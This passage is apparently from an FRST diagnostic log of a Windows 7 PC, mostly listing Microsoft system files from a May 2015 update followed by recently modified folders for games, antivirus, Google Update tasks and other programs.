2015-05-12 18:26 - 2015-04-27 15:16 - 00003584 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-misc-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 15:16 - 00003584 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-memory-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 15:16 - 00003584 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 15:16 - 00003584 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-heap-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 15:16 - 00003072 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 15:16 - 00003072 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-util-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 15:16 - 00003072 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-string-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 15:16 - 00003072 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-profile-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 15:16 - 00003072 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-io-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 15:16 - 00003072 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-interlocked-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 15:16 - 00003072 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-handle-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 15:16 - 00003072 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-fibers-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 15:16 - 00003072 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 15:16 - 00003072 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-delayload-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 15:16 - 00003072 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-debug-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 15:16 - 00003072 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-datetime-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 15:16 - 00003072 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-console-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 15:11 - 03989440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2015-05-12 18:26 - 2015-04-27 15:11 - 03934144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2015-05-12 18:26 - 2015-04-27 15:08 - 01310744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2015-05-12 18:26 - 2015-04-27 15:05 - 00635392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tdh.dll
2015-05-12 18:26 - 2015-04-27 15:05 - 00259584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2015-05-12 18:26 - 2015-04-27 15:05 - 00221184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll
2015-05-12 18:26 - 2015-04-27 15:05 - 00172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll
2015-05-12 18:26 - 2015-04-27 15:05 - 00092160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sechost.dll
2015-05-12 18:26 - 2015-04-27 15:05 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2015-05-12 18:26 - 2015-04-27 15:05 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll
2015-05-12 18:26 - 2015-04-27 15:05 - 00022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll
2015-05-12 18:26 - 2015-04-27 15:05 - 00014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll
2015-05-12 18:26 - 2015-04-27 15:04 - 00641536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll
2015-05-12 18:26 - 2015-04-27 15:04 - 00550912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2015-05-12 18:26 - 2015-04-27 15:04 - 00364544 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tracerpt.exe
2015-05-12 18:26 - 2015-04-27 15:04 - 00082944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\logman.exe
2015-05-12 18:26 - 2015-04-27 15:04 - 00040448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\typeperf.exe
2015-05-12 18:26 - 2015-04-27 15:04 - 00037888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\relog.exe
2015-05-12 18:26 - 2015-04-27 15:04 - 00025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setup16.exe
2015-05-12 18:26 - 2015-04-27 15:04 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2015-05-12 18:26 - 2015-04-27 15:03 - 01114112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll
2015-05-12 18:26 - 2015-04-27 15:03 - 00274944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2015-05-12 18:26 - 2015-04-27 15:03 - 00096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll
2015-05-12 18:26 - 2015-04-27 15:03 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\auditpol.exe
2015-05-12 18:26 - 2015-04-27 15:03 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\diskperf.exe
2015-05-12 18:26 - 2015-04-27 15:03 - 00005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wow32.dll
2015-05-12 18:26 - 2015-04-27 14:59 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apisetschema.dll
2015-05-12 18:26 - 2015-04-27 14:59 - 00005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 14:59 - 00004608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 14:59 - 00004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 14:59 - 00004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 14:59 - 00004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-misc-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 14:59 - 00004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 14:59 - 00004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 14:59 - 00003584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 14:59 - 00003584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 14:59 - 00003584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-memory-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 14:59 - 00003584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 14:59 - 00003584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 14:59 - 00003584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-heap-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 14:59 - 00003072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-string-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 14:59 - 00003072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 14:59 - 00003072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-profile-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 14:59 - 00003072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-io-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 14:59 - 00003072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-handle-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 14:59 - 00003072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 14:59 - 00003072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 14:59 - 00003072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 14:59 - 00003072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-debug-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 14:59 - 00003072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 14:59 - 00003072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-console-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 14:06 - 00036864 _____ (Microsoft Corporation) C:\Windows\system32\UtcResources.dll
2015-05-12 18:26 - 2015-04-27 13:57 - 00007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\instnm.exe
2015-05-12 18:26 - 2015-04-27 13:55 - 00006144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-security-base-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 13:55 - 00004608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 13:55 - 00003584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 13:55 - 00003072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-util-l1-1-0.dll
2015-05-12 18:26 - 2015-04-21 22:28 - 00389840 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2015-05-12 18:26 - 2015-04-21 21:48 - 00342736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2015-05-12 18:26 - 2015-04-21 13:14 - 24971776 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2015-05-12 18:26 - 2015-04-21 13:08 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2015-05-12 18:26 - 2015-04-21 13:07 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2015-05-12 18:26 - 2015-04-21 12:51 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2015-05-12 18:26 - 2015-04-21 12:50 - 00584192 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2015-05-12 18:26 - 2015-04-21 12:50 - 00417792 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2015-05-12 18:26 - 2015-04-21 12:50 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2015-05-12 18:26 - 2015-04-21 12:49 - 02885120 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2015-05-12 18:26 - 2015-04-21 12:48 - 00088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2015-05-12 18:26 - 2015-04-21 12:41 - 00054784 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2015-05-12 18:26 - 2015-04-21 12:40 - 00034304 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2015-05-12 18:26 - 2015-04-21 12:37 - 00633856 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2015-05-12 18:26 - 2015-04-21 12:35 - 00816640 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2015-05-12 18:26 - 2015-04-21 12:35 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2015-05-12 18:26 - 2015-04-21 12:35 - 00114688 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2015-05-12 18:26 - 2015-04-21 12:34 - 00814080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2015-05-12 18:26 - 2015-04-21 12:31 - 06025728 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2015-05-12 18:26 - 2015-04-21 12:26 - 00968704 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2015-05-12 18:26 - 2015-04-21 12:25 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2015-05-12 18:26 - 2015-04-21 12:24 - 19691008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2015-05-12 18:26 - 2015-04-21 12:22 - 00490496 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2015-05-12 18:26 - 2015-04-21 12:14 - 00077824 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2015-05-12 18:26 - 2015-04-21 12:11 - 00504320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2015-05-12 18:26 - 2015-04-21 12:11 - 00062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2015-05-12 18:26 - 2015-04-21 12:10 - 00047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2015-05-12 18:26 - 2015-04-21 12:09 - 00341504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec
2015-05-12 18:26 - 2015-04-21 12:09 - 00199680 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2015-05-12 18:26 - 2015-04-21 12:08 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2015-05-12 18:26 - 2015-04-21 12:08 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2015-05-12 18:26 - 2015-04-21 12:05 - 00316928 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2015-05-12 18:26 - 2015-04-21 12:04 - 02278400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2015-05-12 18:26 - 2015-04-21 12:03 - 00047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2015-05-12 18:26 - 2015-04-21 12:02 - 00030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2015-05-12 18:26 - 2015-04-21 12:00 - 00478208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2015-05-12 18:26 - 2015-04-21 11:58 - 00664576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2015-05-12 18:26 - 2015-04-21 11:58 - 00115712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2015-05-12 18:26 - 2015-04-21 11:57 - 00620032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2015-05-12 18:26 - 2015-04-21 11:49 - 00801280 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2015-05-12 18:26 - 2015-04-21 11:49 - 00720384 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2015-05-12 18:26 - 2015-04-21 11:48 - 00418304 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2015-05-12 18:26 - 2015-04-21 11:47 - 01359360 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2015-05-12 18:26 - 2015-04-21 11:46 - 02125824 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2015-05-12 18:26 - 2015-04-21 11:43 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2015-05-12 18:26 - 2015-04-21 11:40 - 14401536 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2015-05-12 18:26 - 2015-04-21 11:39 - 00168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2015-05-12 18:26 - 2015-04-21 11:38 - 00076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2015-05-12 18:26 - 2015-04-21 11:36 - 00285696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2015-05-12 18:26 - 2015-04-21 11:31 - 04305920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2015-05-12 18:26 - 2015-04-21 11:27 - 02352128 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2015-05-12 18:26 - 2015-04-21 11:26 - 00688640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2015-05-12 18:26 - 2015-04-21 11:25 - 02052608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2015-05-12 18:26 - 2015-04-21 11:24 - 01155072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2015-05-12 18:26 - 2015-04-21 11:17 - 12828672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2015-05-12 18:26 - 2015-04-21 11:15 - 01547264 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2015-05-12 18:26 - 2015-04-21 11:03 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2015-05-12 18:26 - 2015-04-21 11:02 - 01882112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2015-05-12 18:26 - 2015-04-21 10:58 - 01310208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2015-05-12 18:26 - 2015-04-21 10:56 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2015-05-12 18:26 - 2015-04-17 23:10 - 00460800 _____ (Microsoft Corporation) C:\Windows\system32\certcli.dll
2015-05-12 18:26 - 2015-04-17 22:56 - 00342016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll
2015-05-12 18:26 - 2015-04-12 23:28 - 00328704 _____ (Microsoft Corporation) C:\Windows\system32\services.exe
2015-05-12 18:25 - 2015-04-27 15:18 - 00146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll
2015-05-12 18:25 - 2015-04-27 15:18 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll
2015-05-12 18:25 - 2015-04-27 15:16 - 00686080 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
2015-05-12 18:25 - 2015-04-27 15:01 - 00146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaudite.dll
2015-05-12 18:25 - 2015-04-27 15:01 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msobjs.dll
2015-05-12 18:25 - 2015-04-27 14:59 - 00686080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll
2015-05-12 18:25 - 2015-04-27 13:57 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user.exe
2015-05-12 18:25 - 2015-04-19 23:17 - 01647104 _____ (Microsoft Corporation) C:\Windows\system32\DWrite.dll
2015-05-12 18:25 - 2015-04-19 23:17 - 01179136 _____ (Microsoft Corporation) C:\Windows\system32\FntCache.dll
2015-05-12 18:25 - 2015-04-19 22:56 - 01250816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DWrite.dll
2015-05-12 18:25 - 2015-04-19 22:11 - 03204608 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2015-05-12 18:25 - 2015-04-07 23:29 - 00275456 _____ (Microsoft Corporation) C:\Windows\system32\InkEd.dll
2015-05-12 18:25 - 2015-04-07 23:29 - 00024576 _____ (Microsoft Corporation) C:\Windows\system32\jnwmon.dll
2015-05-12 18:25 - 2015-04-07 23:14 - 00216064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\InkEd.dll
2015-05-12 18:25 - 2015-03-04 00:41 - 00342016 _____ (Microsoft Corporation) C:\Windows\system32\apphelp.dll
2015-05-12 18:25 - 2015-03-04 00:41 - 00072192 _____ (Microsoft Corporation) C:\Windows\system32\aelupsvc.dll
2015-05-12 18:25 - 2015-03-04 00:41 - 00023552 _____ (Microsoft Corporation) C:\Windows\system32\sdbinst.exe
2015-05-12 18:25 - 2015-03-04 00:41 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\shimeng.dll
2015-05-12 18:25 - 2015-03-04 00:11 - 00005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shimeng.dll
2015-05-12 18:25 - 2015-03-04 00:10 - 00295936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apphelp.dll
2015-05-12 18:25 - 2015-03-04 00:10 - 00020992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sdbinst.exe
2015-05-12 18:25 - 2015-01-28 23:19 - 02543104 _____ (Microsoft Corporation) C:\Windows\system32\wpdshext.dll
2015-05-12 18:25 - 2015-01-28 23:02 - 02311168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wpdshext.dll
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2015-06-08 12:54 - 2014-02-27 02:35 - 00000000 ____D C:\Users\dell 2\AppData\Local\Battle.net
2015-06-08 12:19 - 2011-06-15 08:20 - 01048605 _____ C:\Windows\WindowsUpdate.log
2015-06-08 12:17 - 2012-07-22 15:11 - 00000000 ____D C:\Users\dell 2
2015-06-08 04:50 - 2014-03-17 02:17 - 00000000 ____D C:\Program Files (x86)\Steam
2015-06-08 04:34 - 2009-07-14 00:45 - 00031312 _____ C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2015-06-08 04:34 - 2009-07-14 00:45 - 00031312 _____ C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2015-06-08 04:28 - 2011-06-15 08:48 - 00000000 ____D C:\ProgramData\Sonic
2015-06-08 04:26 - 2011-08-12 18:58 - 00000000 ____D C:\ProgramData\VMware
2015-06-08 04:24 - 2012-07-22 14:52 - 00108125 _____ C:\Windows\setupact.log
2015-06-08 04:24 - 2009-07-14 01:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2015-06-08 04:23 - 2012-07-22 14:52 - 01848212 _____ C:\Windows\PFRO.log
2015-06-08 04:12 - 2012-07-22 13:29 - 00000000 ____D C:\Program Files (x86)\HandsFree
2015-06-08 03:58 - 2011-08-17 13:12 - 00000000 ____D C:\Program Files (x86)\Pidgin
2015-06-08 03:57 - 2012-07-21 15:06 - 00000000 ____D C:\ProgramData\Norton
2015-06-08 03:39 - 2014-12-10 05:59 - 00000000 ____D C:\Windows\system32\appraiser
2015-06-08 03:39 - 2014-05-07 03:01 - 00000000 ___SD C:\Windows\system32\CompatTel
2015-06-08 03:18 - 2014-07-25 04:40 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2015-06-07 18:52 - 2012-08-02 09:00 - 00000000 ____D C:\Users\dell 2\AppData\Roaming\Skype
2015-06-07 16:51 - 2011-08-20 19:14 - 00001945 _____ C:\Windows\epplauncher.mif
2015-06-07 16:48 - 2009-07-14 01:13 - 00999542 _____ C:\Windows\system32\PerfStringBackup.INI
2015-06-07 16:46 - 2012-08-21 14:10 - 00001236 _____ C:\Users\dell 2\Desktop\Norton Installation Files.lnk
2015-06-07 03:53 - 2013-02-20 19:10 - 00000000 ____D C:\Program Files (x86)\Google
2015-06-07 03:52 - 2014-05-13 07:02 - 00000000 ____D C:\Users\dell 2\AppData\Local\Deployment
2015-06-06 22:04 - 2013-02-13 19:32 - 00000000 ____D C:\Users\MSSQL$SQLEXPRESS
2015-06-06 21:55 - 2014-03-18 20:39 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
2015-06-06 19:55 - 2014-03-18 20:39 - 00003768 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2015-06-06 19:55 - 2013-08-04 10:19 - 00778416 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2015-06-06 19:55 - 2013-08-04 10:19 - 00142512 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2015-06-06 19:43 - 2012-07-22 15:12 - 00000000 ____D C:\Users\dell 2\AppData\Local\Adobe
2015-06-05 22:03 - 2015-03-11 17:23 - 00003138 _____ C:\Windows\System32\Tasks\FRAPS
2015-06-05 22:03 - 2015-01-13 14:38 - 00000000 ____D C:\Fraps
2015-06-05 21:40 - 2012-12-03 10:17 - 00000000 ____D C:\Program Files (x86)\Mozilla Thunderbird
2015-06-05 21:40 - 2009-07-13 23:20 - 00000000 ____D C:\Windows\PolicyDefinitions
2015-06-05 16:48 - 2012-08-09 11:37 - 00000000 ____D C:\Users\dell 2\AppData\Local\CrashDumps
2015-06-05 14:53 - 2010-11-21 03:16 - 00000000 ___RD C:\Users\Public\Recorded TV
2015-06-05 14:53 - 2009-07-14 00:45 - 05130120 _____ C:\Windows\system32\FNTCACHE.DAT
2015-06-05 14:49 - 2011-06-15 10:11 - 00000000 ____D C:\Windows\CSC
2015-06-05 13:53 - 2009-07-13 22:34 - 00000541 _____ C:\Windows\win.ini
2015-06-05 13:50 - 2011-02-10 10:33 - 01014702 _____ C:\Windows\SysWOW64\PerfStringBackup.INI
2015-06-05 13:26 - 2012-07-22 15:12 - 00134816 _____ C:\Users\dell 2\AppData\Local\GDIPFONTCACHEV1.DAT
2015-06-05 11:22 - 2013-05-02 18:21 - 00000000 ____D C:\Windows\system32\appmgmt
2015-06-05 02:56 - 2011-08-11 17:43 - 00000000 ____D C:\Users\Moncef Maiza
2015-06-05 02:56 - 2010-11-20 22:50 - 00000000 ____D C:\Users\Administrator
2015-06-05 01:13 - 2014-02-27 02:35 - 00000000 ____D C:\Program Files (x86)\Battle.net
2015-06-04 23:36 - 2014-02-27 02:35 - 00000000 ____D C:\Users\dell 2\AppData\Roaming\Battle.net
2015-06-04 23:36 - 2013-12-17 23:19 - 00000000 ____D C:\ProgramData\McAfee Security Scan
2015-06-04 23:36 - 2013-03-04 18:58 - 00000000 ____D C:\Users\DefaultAppPool
2015-06-04 23:36 - 2013-03-04 18:36 - 00000000 ____D C:\Users\localhost
2015-06-04 23:36 - 2013-02-11 20:23 - 00000000 ____D C:\Users\Classic .NET AppPool
2015-06-04 23:36 - 2009-07-13 23:20 - 00000000 ____D C:\Windows\system32\NDF
2015-06-04 23:36 - 2009-07-13 23:20 - 00000000 ____D C:\Windows\registration
2015-06-04 22:12 - 2009-07-13 23:20 - 00000000 __RSD C:\Windows\Media
2015-05-31 22:09 - 2015-04-19 20:23 - 00000000 ____D C:\ProgramData\Electronic Arts
2015-05-31 22:09 - 2009-07-14 01:32 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2015-05-31 22:08 - 2014-03-17 04:52 - 00000000 ____D C:\Users\dell 2\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2015-05-31 21:19 - 2012-07-24 16:31 - 00000000 ____D C:\Users\dell 2\AppData\Roaming\.purple
2015-05-31 19:33 - 2012-11-28 19:03 - 00009066 __RSH C:\Users\dell 2\ntuser.pol
2015-05-31 19:33 - 2011-06-15 08:29 - 00009374 __RSH C:\ProgramData\ntuser.pol
2015-05-30 16:45 - 2013-01-14 13:53 - 00000000 ____D C:\Users\dell 2\AppData\Roaming\Dropbox
2015-05-30 16:18 - 2013-01-14 13:57 - 00000000 ___RD C:\Users\dell 2\Dropbox
2015-05-30 13:24 - 2013-02-20 19:10 - 00000898 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2015-05-30 13:24 - 2012-08-20 14:58 - 00000912 _____ C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1038277221-3604561771-2240411101-1006UA.job
2015-05-30 11:24 - 2012-08-20 14:58 - 00000860 _____ C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1038277221-3604561771-2240411101-1006Core.job
2015-05-27 11:27 - 2013-02-20 19:11 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Drive
2015-05-27 11:19 - 2013-02-20 19:10 - 00003894 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2015-05-27 11:19 - 2013-02-20 19:10 - 00003642 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2015-05-27 11:19 - 2013-02-20 19:10 - 00000894 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2015-05-27 11:19 - 2012-08-20 14:58 - 00003884 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1038277221-3604561771-2240411101-1006UA
